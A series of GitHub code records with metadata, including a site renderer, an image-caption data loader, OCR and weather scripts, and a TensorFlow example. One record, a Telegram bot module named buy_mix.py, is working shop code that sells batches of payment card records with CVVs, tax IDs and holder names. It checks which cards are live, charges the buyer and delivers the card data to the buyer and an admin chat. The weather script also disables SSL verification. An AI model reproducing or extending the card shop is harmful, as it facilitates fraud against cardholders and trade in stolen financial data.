gettext.translation('jvk', 'locales', languages=['en']),\n 'fr': gettext.translation('jvk', 'locales', languages=['fr']),\n }\n self.env.install_null_translations()\n self.queue = []\n self.content_dir = content_dir\n self.output_dir = output_dir\n\n def read_content(self, source):\n with open(self.content_dir + source) as content_file:\n return content_file.read()\n\n def add(self, path, *args, **kwargs):\n if 'section' in kwargs and kwargs['section']:\n lang = kwargs['lang']\n section = {'href': path,\n 'title': kwargs['title']}\n try:\n section.update(kwargs['section'])\n except:\n pass\n self.defaults['sections'][lang].append(section)\n args = tuple([path]+list(args))\n self.queue.append((args, kwargs))\n\n\n def render_all(self):\n for args, kwargs in self.queue:\n if 'lang' in kwargs:\n translations = self.translations[kwargs['lang']]\n self.env.install_gettext_translations(translations)\n self.render(*args, **kwargs)\n\n def render(self, path, template, **kwargs):\n kwargs = {**self.defaults, **kwargs}\n page = self.env.get_template(template).render(path=path, **kwargs)\n with open(self.output_dir + path + '.html', 'w') as out:\n out.write(page)\n\n\nif __name__ == \"__main__\":\n import argparse\n argparser = argparse.ArgumentParser(description='Render my resume.')\n argparser.add_argument('input', type=argparse.FileType('r'))\n argparser.add_argument('out', type=argparse.FileType('w'))\n\n args = argparser.parse_args()\n _input = args.input\n out = args.out\n out.write(render(_input))\n", "repo_name": "odontomachus/jvk", "sub_path": "src/jvk/renderer.py", "file_name": "renderer.py", "file_ext": "py", "file_size_in_byte": 2350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "jinja2.FileSystemLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 16, "usage_type": "call"}, {"api_name": "gettext.translation", "line_number": 18, "usage_type": "call"}, {"api_name": "gettext.translation", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 61, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "28008213708", "text": "from io import BytesIO\n\nfrom pyrogram import Client, filters\nfrom pyrogram.types import CallbackQuery, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom config import ADMIN_CHAT\nfrom database import cur, save\nfrom plugins.users.buy_cc import chking\nfrom utils import (\n create_mention,\n get_info_wallet,\n get_price,\n insert_buy_sold,\n insert_sold_balance,\n lock_user_buy,\n msg_mix_buy_user,\n msg_mix_group_adm,\n)\n\n\n# Opção Compra de CCs tipo Mix.\n@Client.on_callback_query(filters.regex(r\"^buy_cc mix$\"))\nasync def buy_mixes(c: Client, m: CallbackQuery):\n levels_list = cur.execute(\n \"SELECT price_name, price FROM prices WHERE price_type LIKE ?\", [\"mix\"]\n ).fetchall()\n levels_list.sort(key=lambda x: int(x[0]))\n\n levels = []\n for level, price in levels_list:\n levels.append(\n InlineKeyboardButton(\n text=f\"Mix {level} | R$ {price}\", callback_data=f\"buy_cc mix {level}\"\n )\n )\n\n organ = (\n lambda data, step: [data[x : x + step] for x in range(0, len(data), step)]\n )(levels, 2)\n organ.append([InlineKeyboardButton(text=\"« Voltar\", callback_data=\"buy_cc\")])\n kb = InlineKeyboardMarkup(inline_keyboard=organ)\n\n await m.edit_message_text(\n f\"\"\"🎲 Comprar Mix\n- Escolha abaixo a quantidade desejada.\n\n{get_info_wallet(m.from_user.id)}\"\"\",\n reply_markup=kb,\n )\n\n\n@Client.on_callback_query(filters.regex(r\"^buy_cc mix (?P\\d+)\"))\n@lock_user_buy\nasync def buy_mix(c: Client, m: CallbackQuery):\n user_id = m.from_user.id\n balance: int = cur.execute(\"SELECT balance FROM users WHERE id = ?\", [user_id]).fetchone()[0] # fmt: skip\n\n type_cc = \"mix\"\n quantity = int(m.matches[0][\"quantity\"])\n\n do_check = quantity <= 10\n\n price = await get_price(type_cc, quantity)\n\n kb = InlineKeyboardMarkup(\n inline_keyboard=[\n [\n InlineKeyboardButton(text=\"« Voltar\", callback_data=\"buy_cc\"),\n ],\n ]\n )\n\n if balance < price:\n return await m.answer(\n \"Você não possui saldo suficiente para esse item. Por favor, faça uma transferência.\",\n show_alert=True,\n )\n\n ccs_list = cur.execute(\n \"SELECT number, month, year, cvv, level, added_date, vendor, bank, country, cpf, name FROM cards WHERE pending = ? ORDER BY RANDOM() LIMIT ?\",\n [False, quantity * 20 if do_check else quantity],\n ).fetchall()\n\n if len(ccs_list) < quantity:\n return await m.answer(\n \"â�—ï¸� Não há CCs disponiveis para o tamanho do mix requisitado.\",\n show_alert=True,\n )\n\n sold_list = []\n\n await m.edit_message_text(\"â�° Aguarde, estou processando o seu pedido...\")\n\n for tp in ccs_list:\n (\n number,\n month,\n year,\n cvv,\n level,\n added_date,\n vendor,\n bank,\n country,\n cpf,\n name,\n ) = tp\n\n card = \"|\".join([number, month, year, cvv])\n is_pending = cur.execute(\n \"SELECT pending FROM cards WHERE number = ?\", [tp[0]]\n ).fetchone()\n # Se retornar None, a cc já foi vendida ou marcada die.\n # Se is_pending[0] for True, ela está sendo verificada por outro processo.\n if not is_pending or is_pending[0]:\n continue\n cur.execute(\"UPDATE cards SET pending = 1 WHERE number = ?\", [number])\n if do_check:\n live_or_die = await chking(card)\n else:\n live_or_die = True, None\n\n if live_or_die[0]: # caso venha cc live\n sold_list.append(tp)\n if len(sold_list) == quantity:\n break\n if do_check:\n await m.edit_message_text(\n f\"â�° Aguarde, estou processando o seu pedido... ({len(sold_list)}/{quantity})\"\n )\n\n elif live_or_die[0] is None: # ccs type return None\n cur.execute(\"UPDATE cards SET pending = False WHERE number = ?\", [tp[0]])\n\n else: # para cc die\n cur.execute(\n \"DELETE FROM cards WHERE number = ?\",\n [tp[0]],\n )\n values = \"number, month, year, cvv, level, added_date, vendor, bank, country, cpf, name, plan\"\n list_dies = tp + (type_cc,)\n cur.execute(\n f\"INSERT INTO cards_dies({values}) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\",\n list_dies,\n )\n # Fim do for, finaliza a compra aqui.\n\n # Se o tamanho da lista de CCs checadas for inferior a quantidade:\n if len(sold_list) < quantity:\n return await m.edit_message_text(\n \"Infelizmente não consegui completar sua requisição de mix.\",\n reply_markup=kb,\n )\n\n # Se o tamaho da lista for igual ao requisitado (sucesso), continua a compra:\n diamonds = (price / 100) * 8\n\n base = await msg_mix_buy_user(\n user_id,\n quantity,\n price,\n diamonds,\n )\n\n to_message = []\n\n for new_cc in sold_list:\n (\n number,\n month,\n year,\n cvv,\n level,\n added_date,\n vendor,\n bank,\n country,\n cpf,\n name,\n ) = new_cc\n\n cur.execute(\n \"DELETE FROM cards WHERE number = ?\",\n [number],\n )\n\n list_dados = new_cc + (user_id, f\"mix {quantity}\", True)\n\n insert_buy_sold(list_dados)\n\n to_message.append(\"|\".join([number, month, year, cvv, vendor, level, bank]))\n\n insert_sold_balance(price, user_id, \"cards\", quantity=quantity)\n\n await m.edit_message_text(base)\n\n file = BytesIO()\n file.name = f\"mix_{m.from_user.id}.txt\"\n file.write(\"\\n\".join(to_message).encode())\n\n await m.message.reply_document(file)\n\n cur.execute(\n \"UPDATE users SET balance = round(balance - ?, 2), balance_diamonds = round(balance_diamonds + ?, 2) WHERE id = ?\",\n [price, diamonds, user_id],\n )\n\n await m.message.reply_text(\n \"✅ Compra realizada com sucesso. Clique no botão abaixo para voltar para o menu principal.\",\n reply_markup=kb,\n )\n\n mention = create_mention(m.from_user)\n adm_msg = msg_mix_group_adm(\n mention,\n quantity,\n price,\n round(balance - price, 2),\n )\n await c.send_message(ADMIN_CHAT, adm_msg)\n await c.send_document(ADMIN_CHAT, file)\n\n save()\n", "repo_name": "RussoBratva/cyberbot", "sub_path": "plugins/users/buy_mix.py", "file_name": "buy_mix.py", "file_ext": "py", "file_size_in_byte": 6541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyrogram.Client", "line_number": 23, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 23, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 24, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 24, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 40, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.get_info_wallet", "line_number": 47, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.Client", "line_number": 54, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 54, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 56, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 56, "usage_type": "name"}, {"api_name": "utils.get_price", "line_number": 63, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 65, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 68, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 79, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 79, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 110, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 110, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 117, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 117, "usage_type": "name"}, {"api_name": "plugins.users.buy_cc.chking", "line_number": 119, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 133, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 133, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 136, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 136, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 142, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 142, "usage_type": "name"}, {"api_name": "utils.msg_mix_buy_user", "line_number": 158, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 182, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.insert_buy_sold", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.insert_sold_balance", "line_number": 193, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 197, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 203, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 203, "usage_type": "name"}, {"api_name": "utils.create_mention", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.msg_mix_group_adm", "line_number": 214, "usage_type": "call"}, {"api_name": "config.ADMIN_CHAT", "line_number": 220, "usage_type": "argument"}, {"api_name": "config.ADMIN_CHAT", "line_number": 221, "usage_type": "argument"}, {"api_name": "database.save", "line_number": 223, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 52, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 52, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 52, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.lock_user_buy", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "32670473195", "text": "\"\"\"\ndata generator module\nhttps://www.kaggle.com/fanbyprinciple/pytorch-image-captioning-with-flickr/notebook\n\"\"\"\nimport os\nimport re\nfrom typing import Callable, List, Tuple\n\nimport numpy as np\nimport spacy\nimport torch\nfrom PIL import Image\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset\n\nSPACY_ENG = spacy.load(\"en_core_web_sm\")\n# pylint: disable = wrong-import-position\nfrom image_caption.utils.data_utils import load_captions_data, train_val_split\n\n\n# pylint: disable = attribute-defined-outside-init\nclass Vocabulary:\n \"\"\"Vocabulary building object\"\"\"\n\n def __init__(self, standardize: Callable):\n \"\"\"Initializer\n\n Args:\n standardize (Callable): utility function for standardizing the text inputs\n \"\"\"\n\n self.standardize = standardize\n\n self.itos = {0: \"\", 1: \"\", 2: \"\", 3: \"\"}\n self.stoi = {\"\": 0, \"\": 1, \"\": 2, \"\": 3}\n\n def __len__(self):\n return len(self.itos)\n\n def tokenizer_eng(self, text: str):\n \"\"\"creates a token vector from a literal phrase\"\"\"\n text = self.standardize(text)\n return [tok.text.lower() for tok in SPACY_ENG.tokenizer(text)]\n\n def build_vocabulary(self, sentences: List[str]) -> None:\n \"\"\"Builds integer key-word and vice-versa dictionaries\n\n Args:\n sentences (List[str]): list of phrases\n \"\"\"\n idx = 4\n frequency = {}\n\n for sentence in sentences:\n for word in self.tokenizer_eng(sentence):\n if word not in frequency:\n frequency[word] = 1\n self.itos[idx] = word\n self.stoi[word] = idx\n idx += 1\n else:\n frequency[word] += 1\n self.weights = np.ones(len(self.itos)) * len(sentences)\n for idx in range(4, len(self.itos)):\n word = self.itos[idx]\n freq = frequency[word]\n self.weights[idx] = freq\n self.weights = 1 / self.weights ** (0.4)\n self.weights = self.weights / min(self.weights)\n # self.weights = (len(sentences) - self.weights) / self.weights\n self.weights = np.expand_dims(np.expand_dims(self.weights, axis=0), axis=-1)\n\n def numericalize(self, sentence: str) -> List[int]:\n \"\"\"returns a vector of integers representing individual word in a phrase\n\n Args:\n sentence (str): input string\n\n Returns:\n List[int]: vector representation of the string\n \"\"\"\n tokenized_text = self.tokenizer_eng(sentence)\n\n return (\n [self.stoi[\"\"]]\n + [\n self.stoi[word] if word in self.stoi else self.stoi[\"\"]\n for word in tokenized_text\n ]\n + [self.stoi[\"\"]]\n )\n\n\n# pylint: disable = too-many-arguments\nclass CaptionDataset(Dataset):\n \"\"\"Prepares the flicker image caption dataset (base)\"\"\"\n\n def __init__(\n self,\n root_dir: str = \"datasets\",\n caption_file: str = \"Flickr8k.token.txt\",\n transform=None,\n seq_length: int = 25,\n split: str = \"train\",\n ) -> None:\n \"\"\"Initializes\n\n Args:\n root_dir (str, optional): Defaults to \"datasets\".\n caption_file (str, optional): name of the captions file.\n Defaults to \"Flickr8k.token.txt\".\n transform ([type], optional): Image transformations Defaults to None.\n seq_length (int, optional): max caption length for the dataset prep. Defaults to 25.\n split (str): data split to return\n \"\"\"\n self.transform = transform\n self.root_dir = root_dir\n\n caption_path = os.path.join(root_dir, caption_file)\n images_path = os.path.join(root_dir, \"Flicker8k_Dataset\")\n\n # Load the dataset\n captions_mapping, text_data = load_captions_data(\n caption_path, images_path, max_seq_length=seq_length\n )\n # strip specific characters from the string\n strip_chars = r\"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\n strip_chars = strip_chars.replace(\"<\", \"\")\n self.strip_chars = strip_chars.replace(\">\", \"\")\n # Build the vocab\n self.vocab = Vocabulary(self.custom_standardization)\n self.vocab.build_vocabulary(text_data)\n\n # Prepare the split # Returns vectorized captions\n train_data, valid_data = train_val_split(\n captions_mapping, self.vocab.numericalize\n )\n self.captions = train_data if split == \"train\" else valid_data\n\n self.images = list(self.captions.keys())\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n image = self.images[index]\n img = Image.open(image).convert(\"RGB\")\n\n if self.transform:\n img = self.transform(img)\n\n numericalized_captions = self.captions[image]\n caption_lens = [[len(caption)] for caption in numericalized_captions]\n\n return img, numericalized_captions, caption_lens\n\n def custom_standardization(self, input_string):\n \"\"\"custom function for removing certain specific substrings from the phrase\"\"\"\n return re.sub(f\"[{re.escape(self.strip_chars)}]\", \"\", input_string)\n\n\nclass Collate:\n \"\"\"process the list of samples to form a batch\"\"\"\n\n def __init__(self, pad_value: int, num_captions: int = 5):\n \"\"\"intialize\n\n Args:\n pad_value (int): value to pad the sequence with\n num_captions (int): number of captions for each image\n \"\"\"\n self.pad_value = pad_value\n self.num_captions = num_captions\n\n def __call__(self, batch: list) -> Tuple[torch.Tensor]:\n \"\"\"returns the batch from input lists\"\"\"\n imgs = [item[0].unsqueeze(0) for item in batch]\n img = torch.cat(imgs, dim=0)\n\n captions_tensor = []\n captions_lens = []\n for i in range(self.num_captions):\n targets = [item[1][i] for item in batch]\n targets = pad_sequence(\n targets, batch_first=True, padding_value=self.pad_value\n )\n captions_tensor.append(targets)\n lengths = [item[2][i] for item in batch]\n captions_lens.append(lengths)\n return (\n img,\n captions_tensor,\n torch.Tensor(captions_lens).to(dtype=torch.int32),\n )\n\n\nif __name__ == \"__main__\": # pragma: no cover\n dataset = CaptionDataset()\n\n out = dataset[100]\n\n out[0].show()\n print([dataset.vocab.itos[key] for key in np.array(out[1])])\n", "repo_name": "Anuj040/image_caption", "sub_path": "image_caption/utils/generator.py", "file_name": "generator.py", "file_ext": "py", "file_size_in_byte": 6657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "spacy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "image_caption.utils.data_utils.load_captions_data", "line_number": 123, "usage_type": "call"}, {"api_name": "image_caption.utils.data_utils.train_val_split", "line_number": 135, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 147, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 147, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 159, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 193, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "33308334243", "text": "from typing import List, Optional\nfrom pydantic import BaseModel\nimport datetime\n\nclass ContentData(BaseModel):\n title: str\n url: str\n description: str\n created_at: Optional[datetime.datetime]\n created_by: Optional[str]\n updated_at: Optional[datetime.datetime]\n updated_by: Optional[str]\n\n\nclass Content(ContentData):\n id: str\n class Config:\n orm_mode = True\n\n\nclass ContentResult(BaseModel):\n count: int\n rows: List[Content]", "repo_name": "goFrendiAsgard/data-platform", "sub_path": "twpFastApp/schemas/content.py", "file_name": "content.py", "file_ext": "py", "file_size_in_byte": 465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pydantic.BaseModel", "line_number": 5, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 9, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "41561057876", "text": "import cv2\nimport numpy as np\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n#import pytesseract as py\nfolder_name = 'input_images'\ncwd = os.getcwd()\nfolder_path = os.path.join(cwd,folder_name)\nall_files = [f for f in listdir(folder_path) if isfile(join(folder_path, f))]\nfor file in all_files:\n image_path = os.path.join(folder_path,file)\n image=cv2.imread(image_path)\n imgGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n imagedenoised=cv2.fastNlMeansDenoising(imgGray,None,3,7,11)\n imgThresh = cv2.adaptiveThreshold(imagedenoised, \n 255, \n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \n cv2.THRESH_BINARY_INV, \n 11, \n 2)\n npaContours, npaHierarchy = cv2.findContours(imgThresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n [intX, intY, intW, intH] = cv2.boundingRect(npaContours[0])\n cv2.rectangle(image,(intX, intY),(intX+intW,intY+intH),(0, 0, 255),2)\n for npaContour in npaContours:\n [intX, intY, intW, intH] = cv2.boundingRect(npaContour)\n cv2.rectangle(image,(intX, intY),(intX+intW,intY+intH),(0, 0, 255),2)\n \n \n cv2.imshow('Binary image',image)\n cv2.waitKey(0)", "repo_name": "ocr-intellectuals-123/ocr-engine", "sub_path": "ocr/Final.py", "file_name": "Final.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.fastNlMeansDenoising", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "29421986157", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nScript name: Weather.py\nAuthor: Nick\nDate: July 2018\nPurpose: Used to fetch and process weather data from ncas' Leeds Weather Data archive\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport os\nimport sys\nimport ssl\nimport pandas as pd\nimport datetime\nimport math\nimport cmath\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ndef fetchWeatherData(date):\n if (not os.environ.get('PYTHONHTTPSVERIFY', '') and\n getattr(ssl, '_create_unverified_context', None)):\n ssl._create_default_https_context = ssl._create_unverified_context\n\n yearstring = str(date.year)\n monthstring = str(date.month) if date.month >= 10 else \"0\"+str(date.month)\n daystring = str(date.day) if date.day >= 10 else \"0\"+str(date.day)\n\n datestring = yearstring + \"-\" + monthstring + \"-\" + daystring\n url = \"https://sci.ncas.ac.uk/leedsweather/Archive/CUSTOM-ARC-\"+datestring+\"-METRIC.csv\"\n weatherdata = pd.read_csv(url, parse_dates=[0], index_col=[0])\n ambientData = weatherdata[['Temp / °C','Humid%','Pressure / hPa']]\n ambientData = ambientData.resample('H').mean()\n ambientData = ambientData.iloc[[date.hour]]\n ambientData = ambientData.round(1)\n\n windData = weatherdata[['Wind / ms¯¹','Winddir / °']]\n startTime = date.strftime(\"%H:%M:%S\")\n\n timeplushour = date + datetime.timedelta(0,3600)\n endTime = timeplushour.strftime(\"%H:%M:%S\")\n windData = windData.between_time(startTime, endTime)\n arrSpeed = windData['Wind / ms¯¹'].tolist()\n arrDirection = windData['Winddir / °'].tolist()\n\n wDirection, wSpeed = polarAverage(arrDirection, arrSpeed)\n\n print(ambientData)\n\n viewModel = {\n 'Temp / °C': ambientData.values[0][0]\n ,'Humid%': ambientData.values[0][1]\n ,'Pressure / hPa': ambientData.values[0][2]\n ,'Wind / ms¯¹': wSpeed\n ,'Winddir / °': wDirection\n }\n\n return viewModel\n\n# http://www.intellovations.com/2011/01/16/wind-observation-calculations-in-fortran-and-python/\ndef polarAverage(arrDirection, arrSpeed):\n wind_vector_sum = None\n\n for i in range(0, arrDirection.__len__()-1):\n direction = math.radians(arrDirection[i])\n wind_polar = cmath.rect(arrSpeed[i], direction)\n if wind_vector_sum is None:\n wind_vector_sum = wind_polar\n else:\n wind_vector_sum += wind_polar\n\n r, phi = cmath.polar(wind_vector_sum / arrDirection.__len__())\n\n rwdir = math.degrees(phi) % 360\n rwspd = r\n # rwdir = int(round(int(round(math.degrees(phi) % 360)) / 10.0))\n # rwspd = int(round(r * 10)) / 10.0\n\n return '%2.0f' % rwdir, '%5.1f' % rwspd", "repo_name": "cemac/LivingLabDataApp", "sub_path": "Weather.py", "file_name": "Weather.py", "file_ext": "py", "file_size_in_byte": 2816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.use", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "ssl._create_default_https_context", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 69, "usage_type": "call"}, {"api_name": "cmath.rect", "line_number": 70, "usage_type": "call"}, {"api_name": "cmath.polar", "line_number": 76, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "29527872627", "text": "import numpy as np\r\nimport tensorflow as tf\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Données d'entraînement\r\npressure = np.array([1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0])\r\ntemperature = np.array([20.0, 25.0, 30.0, 35.0, 40.0, 45.0, 50.0])\r\n\r\n# Division des données en ensembles d'entraînement et de test\r\nX_train, X_test, y_train, y_test = train_test_split(pressure, temperature, test_size=0.2, random_state=42)\r\n\r\n# Création du modèle de réseau de neurones\r\nmodel = tf.keras.Sequential([\r\n tf.keras.layers.Dense(10, input_shape=(1,), activation='relu'),\r\n tf.keras.layers.Dense(1)\r\n])\r\n\r\n# Compilation du modèle\r\nmodel.compile(optimizer='adam', loss='mean_squared_error')\r\n\r\n# Entraînement du modèle\r\nmodel.fit(X_train, y_train, epochs=100, verbose=0)\r\n\r\n# Évaluation du modèle sur l'ensemble de test\r\nloss = model.evaluate(X_test, y_test)\r\nprint('Loss:', loss)\r\n\r\n# Prédiction de la température pour une nouvelle pression\r\nnew_pressure = np.array([5.0])\r\npredicted_temperature = model.predict(new_pressure)\r\nprint('Predicted Temperature:', predicted_temperature)\r\n", "repo_name": "totobruh/IA-scientifique-", "sub_path": "import numpy as np.py", "file_name": "import numpy as np.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "2922621307", "text": "\"\"\"\nSource: https://leetcode.com/problems/01-matrix/description/\nDate: 2023/1/23\nSkill: Dynamic Programming\nRuntime: 504 ms, faster than 99.92%\nMemory Usage: 16.5 MB, less than 98.4%\nTime complexity:\nSpace complexity:\nConstraints:\n\n\"\"\"\nimport math\nfrom typing import List\nfrom collections import defaultdict, deque\nfrom functools import lru_cache, cache\n\nclass Solution:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n m, n = len(mat), 